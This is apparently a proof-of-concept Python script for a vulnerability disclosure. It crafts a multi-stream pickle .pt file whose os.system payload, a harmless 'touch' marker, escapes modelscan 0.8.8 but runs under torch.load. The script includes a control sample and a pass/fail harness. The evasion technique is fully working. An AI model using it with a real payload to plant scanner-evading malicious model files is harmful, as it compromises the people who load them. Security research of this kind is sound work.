#!/usr/bin/env python3
"""Self-contained PoC: modelscan 0.8.8 inspects only the first of multiple sequential
pickle streams in a PyTorch legacy .pt, reporting a malicious file as clean while
torch.load(weights_only=False) executes the payload.
Requires: modelscan==0.8.8, torch. Run: python poc.py
Payload is a benign marker (touch MP_legacy_pwn); no network, no destructive action.
"""
import os, sys, pickle, subprocess
MAGIC = 0x1950a86a20f9469cfc6c  # PyTorch legacy magic number; written as the first pickle stream of the legacy .pt below
def build_multi(path: str) -> None:
    """Write a legacy-format .pt consisting of five back-to-back pickle streams.

    The order follows what the author notes torch._legacy_load expects:
    magic number, protocol version (1001), sys_info dict, the main object
    (here the Payload instance), then the list of storage keys. The final
    empty list means no storage data follows, so the loader reaches the end
    of the file cleanly rather than raising EOFError — the file is
    well-formed, not truncated.

    Each pickle.dumps() result is an independent stream terminated by its
    own STOP opcode. The module docstring's claim is that modelscan 0.8.8
    only looks at the first of them (the MAGIC integer), which is why the
    Payload in the fourth stream goes unreported.

    Args:
        path: output filename; overwritten if it already exists.

    This function only writes bytes. Nothing is executed here; the
    __reduce__ callable runs when the file is later unpickled by a loader
    that honours arbitrary reduce callables (torch.load with
    weights_only=False in the harness below).
    """
    # Valid legacy layout torch._legacy_load expects: magic, protocol, sys_info,
    # main object (payload here), then deserialized storage keys (empty -> no
    # trailing storage data). The empty-keys stream makes torch.load() return
    # cleanly WITHOUT EOFError, so this is a well-formed file, not a malformed one.
    class Payload:
        # Unpickling rebuilds this object by calling os.system("touch MP_legacy_pwn");
        # the marker file is the only observable effect and is what the harness checks.
        # NOTE(review): `touch` is a POSIX utility — on Windows the marker would not
        # appear and the harness would report FAIL even though the load succeeded.
        def __reduce__(self):
            return (os.system, ("touch MP_legacy_pwn",))
    streams = [pickle.dumps(MAGIC), pickle.dumps(1001), pickle.dumps({}),
               pickle.dumps(Payload()), pickle.dumps([])]
    with open(path, "wb") as f:
        # Streams are concatenated with no separator; each carries its own STOP.
        f.write(b"".join(streams))
def build_single(path: str) -> None:
    """Write the control sample: a single ordinary pickle stream.

    Ctl uses the same reduce operator (os.system) as the multi-stream file
    but with the harmless argument "true", so a working scanner is expected
    to flag it. The harness uses this to distinguish a genuine bypass on the
    .pt from a scanner that is simply not detecting os.system at all.

    Args:
        path: output filename; overwritten if it already exists.
    """
    class Ctl:  # same operator, single stream (control)
        def __reduce__(self):
            return (os.system, ("true",))
    with open(path, "wb") as f:
        f.write(pickle.dumps(Ctl()))
def scan(path: str) -> str:
    """Run ``modelscan -p PATH`` and return its stdout and stderr concatenated.

    The exit status is intentionally not checked (no ``check=True``): callers
    decide by matching on the report text. Raises FileNotFoundError if the
    ``modelscan`` CLI is not on PATH.
    """
    proc = subprocess.run(
        ["modelscan", "-p", path],
        capture_output=True,
        text=True,
    )
    report = proc.stdout + proc.stderr
    return report
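# --- Harness -----------------------------------------------------------------
# Four observations are needed for a PASS: the scanner calls the multi-stream
# file clean, torch.load accepts the file without error, the payload marker
# appears, and the single-stream control IS flagged (proves the scanner works).

build_multi("evil_legacy.pt")
multi_clean = "No issues found" in scan("evil_legacy.pt")

# Remove any marker left by an earlier run so a stale file cannot produce a
# false "executed" result.
if os.path.exists("MP_legacy_pwn"):
    os.remove("MP_legacy_pwn")

import torch  # deferred: the scan step above does not need torch

load_ok = False
load_error = None
try:
    # weights_only=False is required here: the weights-only unpickler rejects
    # arbitrary reduce callables, and recent torch releases default to True.
    torch.load("evil_legacy.pt", weights_only=False)
    load_ok = True  # well-formed file: loads without error
except Exception as exc:
    # Keep the failure reason instead of discarding it; a FAIL caused by a
    # torch version mismatch looks identical to a real bug otherwise.
    load_error = f"{type(exc).__name__}: {exc}"
executed = os.path.exists("MP_legacy_pwn")

build_single("evil_single.pkl")
single_flagged = "system" in scan("evil_single.pkl").lower()

print("multi-stream .pt scan clean :", multi_clean)
print("torch.load completed cleanly:", load_ok)
if load_error is not None:
    print("torch.load error            :", load_error)
print("loader executed payload :", executed)
print("single-stream control flagged:", single_flagged)
ok = multi_clean and load_ok and executed and single_flagged
print("RESULT:", "PASS - scanner bypass confirmed" if ok else "FAIL")
# Exit code mirrors the verdict so the PoC can be used from CI or a script.
sys.exit(0 if ok else 1)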